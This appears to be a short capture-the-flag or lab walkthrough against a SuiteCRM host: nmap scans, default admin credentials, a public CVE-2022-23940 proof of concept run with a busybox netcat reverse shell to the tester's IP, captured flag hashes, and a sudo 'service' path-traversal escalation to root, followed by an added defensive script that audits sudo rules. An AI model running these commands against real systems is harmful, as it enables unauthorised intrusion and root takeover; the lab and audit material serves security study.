Enum
sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p- -o udp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP
Services:
Discovered open port 22/tcp on 192.168.156.146
Discovered open port 3306/tcp on 192.168.156.146
Discovered open port 80/tcp on 192.168.156.146
SuiteCRM
admin:admin
If creds don’t work, try them again
Googled the version, found a PoC
python3 exploit.py -h http://192.168.156.146 --payload 'busybox nc 192.168.45.171 22 -e sh'
Username> : admin
Password> :
INFO:CVE-2022-23940:Login did work - Trying to create scheduled report
local
a85831cf76ed3058f142d31ba7357fb7
sudo -l
Matching Defaults entries for www-data on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on localhost:
(ALL) NOPASSWD: /usr/sbin/service
GTFOBins:
sudo /usr/sbin/service ../../../../bin/bash
That's root.
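Added example, not part of the original notes: a defender-side check that parses `sudo -l` output like the one above and flags NOPASSWD rules with no pinned argument list, which is the condition that let `service` be pointed at an arbitrary path. The second rule in the sample and the function names are constructed for illustration.

```python
import re

# Constructed sample: the `sudo -l` output from the notes above, plus one
# hypothetical rule with pinned arguments added for contrast.
SAMPLE = r"""Matching Defaults entries for www-data on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/sbin/service
    (root) NOPASSWD: /usr/sbin/service apache2 restart
"""

# "(runas) TAG: TAG: command[, command]" as printed by `sudo -l`
RULE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

def parse_sudo_l(text):
    """Return one dict per command granted in `sudo -l` output."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        m = RULE.match(line) if in_rules else None
        if not m:
            continue
        tags = [t.strip() for t in m["tags"].split(":") if t.strip()]
        for cmd in re.split(r",\s*(?=/|ALL\b)", m["cmds"].strip()):
            path, _, args = cmd.strip().partition(" ")
            rules.append({"runas": m["runas"], "tags": tags, "path": path, "args": args.strip()})
    return rules

def audit(text):
    """Flag passwordless rules whose arguments are not pinned in sudoers."""
    findings = []
    for r in parse_sudo_l(text):
        if "NOPASSWD" not in r["tags"]:
            continue
        if r["path"] == "ALL":
            findings.append((r["path"], "passwordless ALL"))
        elif r["args"] == "":
            # sudoers: a command with no argument list accepts any arguments
            findings.append((r["path"], "no argument list: any arguments accepted"))
        elif "*" in r["args"]:
            findings.append((r["path"], "wildcard in argument list"))
    return findings

if __name__ == "__main__":
    for path, reason in audit(SAMPLE):
        print(f"{path}: {reason}")
```

In sudoers, pinning the arguments (as in the second sample rule) or writing `""` after the path to allow no arguments at all removes the finding.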
proof
4cea78830ce246f0c7757708228c42e7